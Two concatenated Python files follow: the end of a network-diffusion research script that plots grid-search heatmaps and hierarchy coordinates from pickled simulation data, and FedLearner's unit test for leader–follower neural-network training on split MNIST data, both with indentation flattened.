plot_heatmap(np.array(routing_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'E_rout_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Routing Efficiency')
# plot_heatmap(np.array(np.log(routing_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'ln_E_rout_heatmap'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ln Routing Efficiency')
if global_eff_dist_diffs_flattened: plot_heatmap(np.array(global_eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'global_eff_dist'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='All-to-All Effective Distance Differences')
if log_degree_dist_var_flattened: plot_heatmap(np.array(log_degree_dist_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, f'log_degree_var'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Final Degree Distribution Variance')
# if np.any(ave_nbr_vars): plot_heatmap(np.array(np.log(ave_nbr_vars).reshape(edge_conservation_range.size, selectivity_range.size)), title=Path(grid_search_plots_dir, 'log_ave_neighbor_var'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='log_ave_nbr_var')
if np.any(ave_nbr_vars): plot_heatmap(np.array(ave_nbr_vars).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, 'log_ave_neighbor_var'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='log_ave_nbr_var')
if np.any(ave_cluster_flattened): plot_heatmap(np.array(ave_cluster_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, 'ave_cluster_coefficient'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Average_Cluster_Coefficient')
if np.any(ave_shortest_path_flattened): plot_heatmap(np.array(ave_shortest_path_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(grid_search_plots_dir, 'ave_shortest_path'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Average_Shortest_Path')
if not null_sim:
if eff_dist_diffs_flattened:
plot_heatmap(np.array(eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(grid_search_plots_dir, f'eff_dist_diffs'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Effective Distance Differences to Source')
if mean_eff_dist_diffs_flattened:
plot_heatmap(np.array(mean_eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(grid_search_plots_dir, f'mean_eff_dist'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ave Effective Distance to Source')
print(f"Time lapsed for plotting {num_nodes} nodes, {run_counter} parameter combinations: {utility_funcs.time_lapsed_h_m_s(time.time()-start_time)}")
def grid_search_meta_plots(path_to_data_dir, edge_conservation_range, selectivity_range, output_dir=None, interpolate=None, null_sim=False, verbose=False):
"""
Creates meta plots for a given dataset (sub)directory, and puts the results in new appropriately named subdirectories.
:param path_to_data_dir: string; Path obj, path to data directory
:param edge_conservation_range: float; np.arange, full sequence of edge_conservation values
:param selectivity_range: float; np.arange, full sequence of selectivity values
:param output_dir: string; Path obj: output directory, defaults to the data directory
:param interpolate: optional interpolation method forwarded to the heatmap plots
:param null_sim: Bool: if true, skips the source-based effective distance observables that only exist for non-null simulations
:param verbose: Bool: if true, prints % completion and the time elapsed at the end.
Flattened observables are reshaped into an (edge conservation x selectivity) grid; see the sketch after this function.
"""
start_time = time.time()
if output_dir is None:
output_dir = path_to_data_dir
meta_grid_search_plots_dir = Path(output_dir, f'meta_plots')
try:
os.mkdir(meta_grid_search_plots_dir)
print(f'Created folder for grid search results at {meta_grid_search_plots_dir}')
except OSError:
print(f'{meta_grid_search_plots_dir} already exists, adding or overwriting contents')
pass
if verbose: run_counter = 0
f = []
eff_dist_diffs_flattened = []
mean_eff_dist_flattened = []
global_eff_dist_diffs_flattened = []
ave_nbr_var_flattened = []
degree_dist_var_flattened = []
linear_threshold_hierarchy_coordinates = []
exp_threshold_hierarchy_coordinates = []
efficiency_coordinates = []
for __, __, files in os.walk(path_to_data_dir):
f = sorted(files) # Order preserved due to 0 padding.
assert len(f) == edge_conservation_range.size * selectivity_range.size, f"Not as many files as parameter combinations: \n num_files: {len(f)}, edge_conservation_range.size * selectivity_range.size {edge_conservation_range.size * selectivity_range.size}"
for file in f:
with open(Path(path_to_data_dir, file), 'rb') as data:
G = pickle.load(data)
data.close()
if not null_sim:
if G.eff_dist_diff: eff_dist_diffs_flattened.append(G.eff_dist_diff)
if G.mean_eff_dist: mean_eff_dist_flattened.append(G.mean_eff_dist)
if G.global_eff_dist_diff: global_eff_dist_diffs_flattened.append(G.global_eff_dist_diff)
if G.ave_nbr_var: ave_nbr_var_flattened.append(G.ave_nbr_var)
if G.degree_dist: degree_dist_var_flattened.append(G.degree_dist)
if G.linear_threshold_hierarchy_coordinates: linear_threshold_hierarchy_coordinates.append(
G.linear_threshold_hierarchy_coordinates)
if G.exp_threshold_hierarchy_coordinates: exp_threshold_hierarchy_coordinates.append(
G.exp_threshold_hierarchy_coordinates)
if G.efficiency_coordinates: efficiency_coordinates.append(G.efficiency_coordinates)
if verbose:
num_nodes = G.num_nodes
run_counter += 1
utility_funcs.print_run_percentage(run_counter, len(f))
# ave_nbr_diffs = np.array(ave_neighbor_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size)
ave_nbr_vars = np.array(ave_nbr_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size)
if np.min(ave_nbr_vars) <= 0:
    # Shift so all variances are non-negative, then floor the zeros at the smallest positive value.
    ave_nbr_vars += np.abs(np.min(ave_nbr_vars))
    min_nbr_var = np.min(ave_nbr_vars[ave_nbr_vars > 0])
    ave_nbr_vars = np.where(ave_nbr_vars > 0, ave_nbr_vars, min_nbr_var)
color_map = [int(i * 255 / selectivity_range.size) for i in np.arange(selectivity_range.size, 0, -1)] * int(edge_conservation_range.size) # color scale by selectivity value reversed
edge_conservation_color_map = np.array([[int(i * 255 / edge_conservation_range.size)] * int(selectivity_range.size) for i in np.arange(edge_conservation_range.size, 0, -1)]).flatten() # color scale by edge conservation value reversed
# color_map = [int(i*100/edge_conservation_range.size) for i in range(edge_conservation_range.size)]*int(selectivity_range.size) # color scale by edge conservation value
# color_map = [int(i*100/edge_conservation_range.size) for i in np.arange(edge_conservation_range.size, 0, -1)]*int(selectivity_range.size) # color scale by edge conservation value reversed
plot_limits = [[-1, 1], [0, 1], [0, 1]]
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness",
zlabel="Orderability", color=color_map, plot_limits=plot_limits, plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(meta_grid_search_plots_dir, 'Hierarchy_Coordinates_[Linear_Thresholds]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=color_map, plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(meta_grid_search_plots_dir, 'Hierarchy_Coordinates_[Exponential_Thresholds]'))
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness",
zlabel="Orderability", color=edge_conservation_color_map, plot_limits=plot_limits,
plot_projections=True,
fig_title='Hierarchy Coordinates (Linear Thresholds)',
title=Path(meta_grid_search_plots_dir,
'Hierarchy_Coordinates_[Linear_Thresholds_Colored_via_Edge_Conservation]'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness",
ylabel="Feedforwardness", zlabel="Orderability", color=edge_conservation_color_map,
plot_limits=plot_limits,
plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)',
title=Path(meta_grid_search_plots_dir,
'Hierarchy_Coordinates_[Exponential_Thresholds_Colored_via_Edge_Conservation]'))
scaling = 2
cropped_diff_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 0], std_multiple_cutoff=2)
cropped_rout_eff = utility_funcs.crop_outliers(np.array(efficiency_coordinates)[:, 1], std_multiple_cutoff=1)
diff_eff_std, diff_eff_mean = np.std(cropped_diff_eff), np.mean(cropped_diff_eff)
rout_eff_std, rout_eff_mean = np.std(cropped_rout_eff), np.mean(cropped_rout_eff)
x_eff_lim = [diff_eff_mean - (scaling * diff_eff_std), diff_eff_mean + (scaling * diff_eff_std)]
y_eff_lim = [rout_eff_mean - (scaling * rout_eff_std), rout_eff_mean + (scaling * rout_eff_std)]
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, plot_limits=[x_eff_lim, y_eff_lim], fig_title="Diffusion vs Routing Efficiency",
title=Path(meta_grid_search_plots_dir, 'Efficiency_Scores_wo_outliers'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, plot_limits=[[0, 1.5], [0, 1.5]], fig_title="Diffusion vs Routing Efficiency",
title=Path(meta_grid_search_plots_dir, 'Efficiency_Scores_Around_1'))
plot_2d_data(np.array(efficiency_coordinates), xlabel="Diffusion Efficiency", ylabel="Routing Efficiency",
color=color_map, fig_title="Diffusion vs Routing Efficiency",
title=Path(meta_grid_search_plots_dir, 'Efficiency_Scores'))
# Efficiency Heatmaps:
diffusion_efficiencies, routing_efficiencies = np.array(efficiency_coordinates)[:, 0], np.array(
efficiency_coordinates)[:, 1]
plot_heatmap(np.array(diffusion_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'E_diff_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Diffusion Efficiency')
plot_heatmap(np.array(np.log(diffusion_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'ln_E_diff_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ln Diffusion Efficiency')
plot_heatmap(np.array(routing_efficiencies).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'E_rout_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Routing Efficiency')
plot_heatmap(np.array(np.log(routing_efficiencies)).reshape(edge_conservation_range.size, selectivity_range.size),
title=Path(meta_grid_search_plots_dir, f'ln_E_rout_heatmap'), x_range=selectivity_range,
y_range=edge_conservation_range, normalize=False, interp_method=interpolate, fig_title='Ln Routing Efficiency')
plot_heatmap(np.array(eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'eff_dist_diff_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='Effective Distance Difference to Source')
plot_heatmap(np.array(mean_eff_dist_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'mean_eff_dist_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='Average Effective Distance to Source')
plot_heatmap(np.array(global_eff_dist_diffs_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'global_eff_dist_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='All-to-All Effective Distance Differences')
plot_heatmap(np.array(degree_dist_var_flattened).reshape(edge_conservation_range.size, selectivity_range.size), title=Path(meta_grid_search_plots_dir, f'degree_var_histogram'), x_range=selectivity_range, y_range=edge_conservation_range, normalize=True, interp_method=interpolate, fig_title='Final Degree Distribution Variance')
general_3d_data_plot(data=np.array(linear_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness", zlabel="Orderability", plot_projections=True, fig_title='Hierarchy Coordinates (Linear Thresholds)', title=Path(meta_grid_search_plots_dir, 'Hierarchy_Coordinates'))
general_3d_data_plot(data=np.array(exp_threshold_hierarchy_coordinates), xlabel="Treeness", ylabel="Feedforwardness", zlabel="Orderability", plot_projections=True, fig_title='Hierarchy Coordinates (Exponential Thresholds)', title=Path(meta_grid_search_plots_dir, 'Exp_Thresholds_Hierarchy_Coordinates'))
if verbose: print(f"Time lapsed for {num_nodes} node, {run_counter} parameter combinations: {int((time.time()-start_time) / 60)} minutes, {np.round((time.time()-start_time) % 60, 2)} seconds")
def all_plots_from_super_data_dir(path_to_data_dir, edge_conservation_range, selectivity_range, output_dir=None):
"""
Function simply allows for all plots to be generated from data via specifying super directory,
e.g. if many different node numbers were tested, and the resultant data was all stored (in their own generated folders) in a super directory.
:param path_to_data_dir: path to data directory.
:param edge_conservation_range: float array; np.arange: full sequence of edge conservation (coupling) values
:param selectivity_range: float array; np.arange: full sequence of selectivity values
:param output_dir: string; path obj: output directory. Defaults to the data directory
"""
if output_dir is None:
output_dir = path_to_data_dir
sub_dirs = sorted([dirs[0] for dirs in os.walk(path_to_data_dir) if dirs[0] != str(path_to_data_dir)])
for sub_dir in sub_dirs:
node_nums = int(str(str(sub_dir).split('/')[-1]).split('_')[-1]) # takes the node number as the end number of the latest subdirectory
grid_search_meta_plots(Path(sub_dir), edge_conservation_range, selectivity_range, output_dir=output_dir)
# Grid-Search Observables: ------------------------------------------------------------------------------------------
def cluster_coeff_diff(data_dir, initial_graph=0, final_graph=-1, clustering_timestep=-1):
"""
Loads and evaluates the clustering coefficients of the last (clustering_) timestep of the (initial, final) data graph
and returns their difference.
"""
for root, dirs, files in os.walk(data_dir):
f = sorted(files) # Order preserved due to 0 padding.
with open(Path(data_dir, f[initial_graph]), 'rb') as initial_graph_loaded:
G_initial = pickle.load(initial_graph_loaded)
initial_graph_loaded.close()
with open(Path(data_dir, f[final_graph]), 'rb') as final_graph_loaded:
G_final = pickle.load(final_graph_loaded)
final_graph_loaded.close()
initial_clustering_coeff = nx.average_clustering(G_initial.convert_to_nx_graph(timestep=clustering_timestep), weight='weight')
final_clustering_coeff = nx.average_clustering(G_final.convert_to_nx_graph(timestep=clustering_timestep), weight='weight')
return final_clustering_coeff - initial_clustering_coeff
def shortest_path_diff(data_dir, initial_graph=0, final_graph=-1, shortest_path_at_timestep=-1):
"""
Loads and evaluates the average shortest path length of the last (shortest_path_at) timestep of the (initial, final)
data graph and takes their difference.
"""
for root, dirs, files in os.walk(data_dir):
f = sorted(files) # Order preserved due to 0 padding.
with open(Path(data_dir, f[initial_graph]), 'rb') as initial_graph_loaded:
G_initial = pickle.load(initial_graph_loaded)
initial_graph_loaded.close()
with open(Path(data_dir, f[final_graph]), 'rb') as final_graph_loaded:
G_final = pickle.load(final_graph_loaded)
final_graph_loaded.close()
initial_ave_shortest_path = nx.average_shortest_path_length(G_initial.convert_to_nx_graph(timestep=shortest_path_at_timestep), weight='weight')
final_ave_shortest_path = nx.average_shortest_path_length(G_final.convert_to_nx_graph(timestep=shortest_path_at_timestep), weight='weight')
return final_ave_shortest_path - initial_ave_shortest_path
def ave_degree_diff(data_dir, initial_graph=0, final_graph=-1, ave_degree_at_timestep=-1):
"""
Loads and evaluates the average degree connectivity (~k-nearest-neighbors) at the last (ave_degree_at_) timestep
of the (initial, final) data graph and takes their difference. TODO: Will this always yield [0.]?
"""
for root, dirs, files in os.walk(data_dir):
f = sorted(files) # Order preserved due to 0 padding.
with open(Path(data_dir, f[initial_graph]), 'rb') as initial_graph_loaded:
G_initial = pickle.load(initial_graph_loaded)
initial_graph_loaded.close()
with open(Path(data_dir, f[final_graph]), 'rb') as final_graph_loaded:
G_final = pickle.load(final_graph_loaded)
final_graph_loaded.close()
initial_ave_degree = np.array(list(nx.average_degree_connectivity(G_initial.convert_to_nx_graph(timestep=ave_degree_at_timestep), weight='weight').values()))
final_ave_degree = np.array(list(nx.average_degree_connectivity(G_final.convert_to_nx_graph(timestep=ave_degree_at_timestep), weight='weight').values()))
return final_ave_degree - initial_ave_degree
# Hierarchy Coordinates: ---------------------------------------------------------------------------------------------
def plot_hierarchy_evolution(graph, time_between_sampling, morphospace_limits=True):
# Sample the hierarchy coordinates every `time_between_sampling` timesteps.
coordinates = np.array([graph.average_hierarchy_coordinates(timestep=timestep)
                        for timestep in range(0, graph.A.shape[0], time_between_sampling)])
print(f'coordinates: {coordinates}')
plot_limits = None
if morphospace_limits: plot_limits = [[-1, 1], [0, 1], [0, 1]]
color_map = [int(i * 255 / coordinates.shape[0]) for i in np.arange(coordinates.shape[0], 0, -1)]  # color scale by sampling order, reversed
general_3d_data_plot(coordinates, xlabel='Treeness', ylabel='Feedforwardness', zlabel='Orderability', plot_limits=plot_limits, color=color_map, show=True)
########################################################################################################################
if __name__ == "__main__":
# CHECK VERSIONS
vers_python0 = '3.7.3'
vers_numpy0 = '1.17.3'
vers_matplotlib0 = '3.1.1'
vers_netx0 = '2.5'
from sys import version_info
from matplotlib import __version__ as vers_matplotlib
from networkx import __version__ as vers_netx
vers_python = '%s.%s.%s' % version_info[:3]
vers_numpy = np.__version__
print('\n------------------- Network Diffusion Adaptation ----------------------------\n')
print('Required modules:')
print('Python: tested for: %s. Yours: %s' % (vers_python0, vers_python))
print('numpy: tested for: %s. Yours: %s' % (vers_numpy0, vers_numpy))
print('matplotlib: tested for: %s. Yours: %s' % (vers_matplotlib0, vers_matplotlib))
print('networkx: tested for: %s. Yours: %s' % (vers_netx0, vers_netx))
print('\n------------------------------------------------------------------------------\n')
|
test_nn_trainer.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import unittest
import threading
import random
import os
import time
import logging
from multiprocessing import Process
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import gfile
from queue import PriorityQueue
import enum
from tensorflow.core.example.feature_pb2 import FloatList, Features, Feature, \
Int64List, BytesList
from tensorflow.core.example.example_pb2 import Example
import numpy as np
from fedlearner.data_join import (
data_block_manager, common,
data_block_visitor, raw_data_manifest_manager
)
from fedlearner.common import (
mysql_client, common_pb2 as common_pb,
data_join_service_pb2 as dj_pb
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
from fedlearner.trainer_master.leader_tm import LeaderTrainerMaster
from fedlearner.trainer_master.follower_tm import FollowerTrainerMaster
from fedlearner.data_join.common import get_kvstore_config
from graph_def.leader import main as lm
from graph_def.follower import main as fm
debug_mode = False
local_mnist_path = "./mnist.npz"
output_path = "./output"
logging.getLogger().setLevel(logging.INFO)
total_worker_num = 1
child_env = os.environ.copy()
child_env["KVSTORE_USE_MOCK"] = "on"
child_env["KVSTORE_MOCK_DISK_SYNC"] = "on"
os.environ = child_env
class _Task(object):
def __init__(self, name, weight, target, args=None, kwargs=None, daemon=None, force_quit=False):
self.name = name
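# The weight is stored negated because PriorityQueue pops the smallest item first, so tasks
# created with a larger weight are dequeued earlier (ordering is resolved via __gt__ below).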
self.weight = 0 - weight
self._target = target
self._args = args
self._kwargs = kwargs
self.force_quit = force_quit
self._daemon = daemon if daemon is not None else True
self._lock = threading.Lock()
self._task = None
self._stop = False
self._start_new()
def _start_new(self):
if self._task is not None and self._task.is_alive():
logging.info(" %s is alive, no need to start new" % self.name)
return
self._task = Process(target=self._target, name=self.name,
args=self._args, kwargs=self._kwargs, daemon=self._daemon)
if isinstance(self._args[0], Args):
logging.info("delete %s", self._args[0].export_path)
if gfile.Exists(self._args[0].export_path):
logging.info(" deleting")
gfile.DeleteRecursively(self._args[0].export_path)
self._task.start()
logging.info("Task starts %s" % self.name)
time.sleep(10)
def __gt__(self, o):
return self.weight > o.weight
def kill(self, force = False):
with self._lock:
logging.info("Kill task %s", self.name)
if self._task is None or not self._task.is_alive():
return
if force or self.force_quit:
self._task.terminate()
elif self._task.is_alive():
raise ValueError("can not kill by force")
def start(self):
logging.info("begin to start")
with self._lock:
if self._stop:
return
if self._task.is_alive():
logging.info(" %s is alive, no need to start" % self.name)
return
self._start_new()
time.sleep(2)
def is_alive(self):
with self._lock:
if self._task is None:
return True
return self._task.is_alive()
class _Signal(enum.Enum):
KILL = 1
RUN = 2
class _Event(object):
def __init__(self, name, action, timeout):
self.name = name
self.action = action
self.timeout = timeout
self._start_time = time.time()
self._trigged = False
def handle(self, task):
if self._trigged:
return
if self.timeout + self._start_time > time.time():
return
logging.info("handle event: %s=%s", task.name, self.action)
self._trigged = True
if self.action == _Signal.KILL:
task.kill(True)
elif self.action == _Signal.RUN:
task.start()
else:
raise ValueError("unknown event %d" % self.action)
class _TaskScheduler(object):
def __init__(self, timeout):
self._task_queue = PriorityQueue()
self._task_done = {}
self._start_time = time.time()
self._event_queue = []
self._task_killed = {}
self._keepalive = []
self._timeout = timeout
def submit(self, task):
self._keepalive.append(task.name)
self._task_queue.put(task)
def recv(self, ev):
self._event_queue.append(ev)
def _handle_events(self, name, task):
for e in self._event_queue:
if e.name == name:
e.handle(task)
def bye(self):
while not self._task_queue.empty():
task = self._task_queue.get()
if task.is_alive():
task.kill(True)
def run(self):
while not self._task_queue.empty():
task = []
done = {}
while not self._task_queue.empty():
next_task = self._task_queue.get()
logging.info("handle queue: %s", next_task.name)
if not next_task.is_alive():
done[next_task.name] = next_task
continue
self._handle_events(next_task.name, next_task)
if next_task.is_alive():
task.append(next_task)
else:
done[next_task.name] = next_task
for t in task:
self._task_queue.put(t)
for k, v in done.items():
if k in self._keepalive:
if v._task.exitcode != 0:
v.start()
self._task_queue.put(v)
continue
self._task_done[k] = v
time.sleep(1)
if self._timeout + self._start_time < time.time():
logging.info("stop!!!!!")
return
def make_ckpt_dir(role, remote="local", rank=None):
if rank is None:
rank = "N"
ckpt_path = "{}/{}_ckpt_{}_{}".format(output_path, remote, role, rank)
exp_path = "{}/saved_model".format(ckpt_path)
if gfile.Exists(ckpt_path):
gfile.DeleteRecursively(ckpt_path)
return ckpt_path, exp_path
def run_leader_tm(app_id, data_source, port, env=None):
if env is not None:
os.environ = env
leader_tm = LeaderTrainerMaster(app_id, data_source,
None, None,
False, False, 1)
leader_tm.run(listen_port=int(port))
def run_ps(port, env=None):
if env is not None:
os.environ = env
addr = "0.0.0.0:{}".format(port)
cluster_spec = tf.train.ClusterSpec({'local': {0: addr}})
server = tf.train.Server(cluster_spec, job_name="local", task_index=0)
server.join()
def run_follower_tm(app_id, data_source, port, env=None):
if env is not None:
os.environ = env
follower_tm = FollowerTrainerMaster(app_id, data_source, False)
follower_tm.run(listen_port=int(port))
def run_lm(args, env=None):
if env is not None:
os.environ = env
lm(args)
def run_fm(args, env=None):
if env is not None:
os.environ = env
fm(args)
class Args(object):
def __init__(self, local_addr=None, peer_addr=None, app_id=None, master_addr=None,
data_source=None, data_path=None, ckpt_path=None, export_path=None,
start_time=None, end_time=None, tf_addr=None, cluster_spec=None, ps_addrs=None,
worker_rank=0):
self.local_addr = local_addr
self.peer_addr = peer_addr
self.worker_rank = worker_rank
self.cluster_spec = cluster_spec
self.ps_addrs = ps_addrs
self.data_source = data_source
self.data_path = data_path
self.application_id = app_id
self.start_time = start_time
self.end_time = end_time
self.master_addr = master_addr
self.tf_addr = tf_addr
self.checkpoint_path = ckpt_path
self.save_checkpoint_steps = 100
self.save_checkpoint_secs = None
self.export_path = export_path
self.sparse_estimator = False
self.mode = "train"
self.summary_path = None
self.summary_save_steps = None
self.verbosity = 1
self.batch_size = 100
self.learning_rate = 0.01
class TestNNTraining(unittest.TestCase):
def _create_local_data(self, xl, xf, y):
N = 10
chunk_size = xl.shape[0]//N
leader_worker_path = os.path.join(output_path, "data/leader")
follower_worker_path = os.path.join(output_path, "data/follower")
data_path = os.path.join(output_path, "data")
if gfile.Exists(data_path):
gfile.DeleteRecursively(data_path)
os.makedirs(leader_worker_path)
os.makedirs(follower_worker_path)
for i in range(N):
filename_l = os.path.join(leader_worker_path, '%02d.tfrecord'%i)
filename_f = os.path.join(follower_worker_path, '%02d.tfrecord'%i)
fl = tf.io.TFRecordWriter(filename_l)
ff = tf.io.TFRecordWriter(filename_f)
for j in range(chunk_size):
idx = i*chunk_size + j
features_l = {}
features_l['example_id'] = Feature(
bytes_list=BytesList(value=[str(idx).encode('utf-8')]))
features_l['y'] = Feature(int64_list=Int64List(value=[y[idx]]))
features_l['x'] = Feature(float_list=FloatList(value=list(xl[idx])))
fl.write(
Example(features=Features(feature=features_l)).SerializeToString())
features_f = {}
features_f['example_id'] = Feature(
bytes_list=BytesList(value=[str(idx).encode('utf-8')]))
features_f['x'] = Feature(float_list=FloatList(value=list(xf[idx])))
ff.write(
Example(features=Features(feature=features_f)).SerializeToString())
fl.close()
ff.close()
def _create_data_block(self, data_source, partition_id, x, y):
data_block_metas = []
dbm = data_block_manager.DataBlockManager(data_source, partition_id)
self.assertEqual(dbm.get_dumped_data_block_count(), 0)
self.assertEqual(dbm.get_lastest_data_block_meta(), None)
N = 200
chunk_size = x.shape[0] // N
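# Assumption: leader example indices start at 0 while follower indices start well past the
# leader range, so the two index spaces stay disjoint within a data block.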
leader_index = 0
follower_index = N * chunk_size * 10
for i in range(N):
builder = DataBlockBuilder(
common.data_source_data_block_dir(data_source),
data_source.data_source_meta.name,
partition_id, i,
dj_pb.WriterOptions(output_writer="TF_RECORD"), None
)
builder.set_data_block_manager(dbm)
for j in range(chunk_size):
feat = {}
idx = i * chunk_size + j
exam_id = '{}'.format(idx).encode()
feat['example_id'] = Feature(
bytes_list=BytesList(value=[exam_id]))
evt_time = random.randint(1, 1000)
feat['event_time'] = Feature(
int64_list = Int64List(value=[evt_time])
)
feat['x'] = Feature(float_list=FloatList(value=list(x[idx])))
if y is not None:
feat['y'] = Feature(int64_list=Int64List(value=[y[idx]]))
feat['leader_index'] = Feature(
int64_list = Int64List(value=[leader_index])
)
feat['follower_index'] = Feature(
int64_list = Int64List(value=[follower_index])
)
example = Example(features=Features(feature=feat))
builder.append_item(TfExampleItem(example.SerializeToString()),
leader_index, follower_index)
leader_index += 1
follower_index += 1
data_block_metas.append(builder.finish_data_block())
self.max_index = follower_index
return data_block_metas
def _gen_ds_meta(self, role):
data_source = common_pb.DataSource()
data_source.data_source_meta.name = self.app_id
data_source.data_source_meta.partition_num = 1
data_source.data_source_meta.start_time = 0
data_source.data_source_meta.end_time = 100000
data_source.output_base_dir = "{}/{}_{}/data_source/".format(output_path,
data_source.data_source_meta.name, role)
data_source.role = role
return data_source
def setUp(self):
self.sche = _TaskScheduler(30)
self.kv_store = [None, None]
self.app_id = "test_trainer_v1"
db_database, db_addr, db_username, db_password, db_base_dir = \
get_kvstore_config("etcd")
data_source = [self._gen_ds_meta(common_pb.FLRole.Leader),
self._gen_ds_meta(common_pb.FLRole.Follower)]
for role in range(2):
self.kv_store[role] = mysql_client.DBClient(data_source[role].data_source_meta.name,
db_addr, db_username, db_password, db_base_dir, True)
self.data_source = data_source
(x, y) = (None, None)
if debug_mode:
(x, y), _ = tf.keras.datasets.mnist.load_data(local_mnist_path)
else:
(x, y), _ = tf.keras.datasets.mnist.load_data()
x = x[:200,]
x = x.reshape(x.shape[0], -1).astype(np.float32) / 255.0
y = y.astype(np.int64)
xl = x[:, :x.shape[1]//2]
xf = x[:, x.shape[1]//2:]
self._create_local_data(xl, xf, y)
x = [xl, xf]
for role in range(2):
common.commit_data_source(self.kv_store[role], data_source[role])
if gfile.Exists(data_source[role].output_base_dir):
gfile.DeleteRecursively(data_source[role].output_base_dir)
manifest_manager = raw_data_manifest_manager.RawDataManifestManager(
self.kv_store[role], data_source[role]
)
partition_num = data_source[role].data_source_meta.partition_num
for i in range(partition_num):
self._create_data_block(data_source[role], i,
x[role], y)
#x[role], y if role == 0 else None)
manifest_manager._finish_partition('join_example_rep',
dj_pb.JoinExampleState.UnJoined, dj_pb.JoinExampleState.Joined,
-1, i)
#@unittest.skip("demonstrating skipping")
def test_local_cluster(self):
workers = []
addr = ["localhost:20050", "localhost:20051"]
role = 0
ckpt_path, exp_path = make_ckpt_dir(role)
args = Args(local_addr=addr[role],
peer_addr=addr[(role+1)%2],
app_id=self.app_id,
data_path=os.path.join(output_path, "data/leader"),
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = Process(name="RunLeaderTW", target=run_lm, args=(args, ),
kwargs={'env' : child_env}, daemon=True)
ftm.start()
workers.append(ftm)
role = 1
ckpt_path, exp_path = make_ckpt_dir(role)
args = Args(local_addr=addr[role],
peer_addr=addr[(role+1)%2],
app_id=self.app_id,
data_path=os.path.join(output_path, "data/follower"),
ckpt_path=ckpt_path,
export_path=exp_path)
ftm = Process(name="RunFollowerTW", target=run_fm, args=(args, ),
kwargs={'env' : child_env}, daemon=True)
ftm.start()
workers.append(ftm)
for w in workers:
w.join()
#@unittest.skip("demonstrating skipping")
def test_remote_cluster(self):
self.sche.bye()
master_addr = ["0.0.0.0:4050", "0.0.0.0:4051"]
ps_addr = ["0.0.0.0:5050", "0.0.0.0:5051"]
## launch master
role = 0
